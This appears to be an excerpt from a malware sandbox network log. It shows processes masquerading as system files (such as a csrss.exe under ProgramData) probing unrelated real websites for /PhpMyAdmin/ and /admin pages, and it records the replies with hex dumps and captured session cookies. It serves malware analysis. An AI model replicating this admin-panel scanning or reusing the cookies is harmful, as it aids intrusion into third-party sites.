                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 63 75 73 74 6f 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /div></div></div></div></footer></div><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/bootstrap.min.js"></script><script type="text/javascript" src="js/custom.js"></script><script type="tex
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC858INData Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 48 43 43 68 61 74 4f 70 74 69 6f 6e 73 20 3d 20 7b 7d 3b 0d 0a 4c 48 43 43 68 61 74 4f 70 74 69 6f 6e 73 2e 6f 70 74 20 3d 20 7b 77 69 64 67 65 74 5f 68 65 69 67 68 74 3a 33 34 30 2c 77 69 64 67 65 74 5f 77 69 64 74 68 3a 33 30 30 2c 70 6f 70 75 70 5f 68 65 69 67 68 74 3a 35 32 30 2c 70 6f 70 75 70 5f 77 69 64 74 68 3a 35 30 30 7d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 76 61 72 20 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 70 6f 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sync></script><script type="text/javascript">var LHCChatOptions = {};LHCChatOptions.opt = {widget_height:340,widget_width:300,popup_height:520,popup_width:500};(function() {var po = document.createElement('script'); po.type = 'text/javascript';
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                230192.168.2.649732186.113.7.2044435176C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC188OUTGET /PhpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC911INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1002
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=2433883564.59425.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: dcid=1707131773186-10479769; Expires=Sun, 05-May-2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: pvid=1707131773186-33486568; Expires=Mon, 05-Feb-2024 11:21:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=PFGGGHOEFHFJJIGLKLONMMHPJDIKNIEAHOHIINLMJBOIFAECOFHFANFLAEBNJHHDFOIDFJMKCDDMDOFEIHKAFOAODMFJLBMGIMJAJEMDGKLLKPGDDHFEFLPGPBDIIKFF; HttpOnly; secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS0130ba83=01fd6418ebf9b391ff7be85a7e259b18ee92b6459b4f4dc3e4bdcf6ca809e01ccab82d0297eebebe66346e18ace865d7ceb0548e9c0298c24ff897f9ef3dd0d345c515f5a944d23c2587cd15341766f1377e550cedc60c590b355975812aa5458dddc59248116b6e21cb64ae1bc8a7b592c019e791; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1002INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 37 2e 30 2e 31 30 2e 46 69 6e 61 6c 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                231192.168.2.649691142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 4d 34 41 36 69 55 6d 49 38 39 48 55 2d 56 61 30 63 35 72 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EM4A6iUmI89HU-Va0c5rFQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                232192.168.2.64973044.195.133.1454433132C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC332OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FF
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1057INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=63FBDB375E799FE348AE328A8197F7B1; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142573,id:F7BB58415B27927F21C3700158ABAED0,sessionId:7775344764,signature:81c7df77b97c05bffba0d70f1105bf4aad49b75260f03df15427adf2b838d3e3,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:4ca3e684-5c23-479e-88e4-1e1eafc733c2; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC15327INData Raw: 62 62 63 34 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: bbc4... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 61 28 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 69 6e 66 6f 7c 7c 7b 7d 3b 65 2e 69 6e 66 6f 3d 7b 62 65 61 63 6f 6e 3a 6f 2e 62 65 61 63 6f 6e 2c 65 72 72 6f 72 42 65 61 63 6f 6e 3a 6f 2e 65 72 72 6f 72 42 65 61 63 6f 6e 2c 2e 2e 2e 74 7d 7d 28 29 2c 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: (0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}function l(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),funct
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16365INData Raw: 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61 63 74 6f 72 5f 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 5f 61 75 74 68 4c 6f 67 69 6e 22 20 69 64 3d 22 63 73 73 5f 31 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 77 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_factor_authentication.css?v=3900.84.0-rel.31+aedff82_authLogin" id="css_1"> <link rel="stylesheet" type="text/css" href="/we
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC19INData Raw: 37 66 65 30 0d 0a ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7fe0bn,Rama
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 4d 4f 4e 54 48 5f 53 48 4f 52 54 2e 30 30 35 32 30 27 5d 20 3d 20 27 65 6e 65 20 66 65 62 20 6d 61 72 20 61 62 72 20 6d 61 79 20 6a 75 6e 20 6a 75 6c 20 61 67 6f 20 73 65 70 20 6f 63 74 20 6e 6f 76 20 64 69 63 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 6e 75 6d 62 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTINGS['LOCALE_SETTINGS.MONTH_SHORT.00520'] = 'ene feb mar abr may jun jul ago sep oct nov dic'; LOCALE_SETTINGS['number
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 75 62 6c 69 63 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 72 6f 6e 75 6e 63 69 61 74 69 6f 6e 5f 61 75 64 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); deleteCookie("JSESSIONID", "/public", null, true); deleteCookie("JSESSIONID", "/pronunciation_audio", null, true);
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC12443INData Raw: 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 69 6e 70 75 74 22 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 2d 6c 61 62 65 6c 22 3e 45 73 63 72 69 62 61 20 65 6c 20 63 c3 b3 64 69 67 6f 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 20 3e 45 73 63 72 69 62 61 20 65 6c 20 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verification-input" class="custom-label">Escriba el cdigo</label> <p id="mfa-verification-description" >Escriba el c


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                233192.168.2.64967944.199.96.179443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                234192.168.2.65002034.149.46.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5747INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
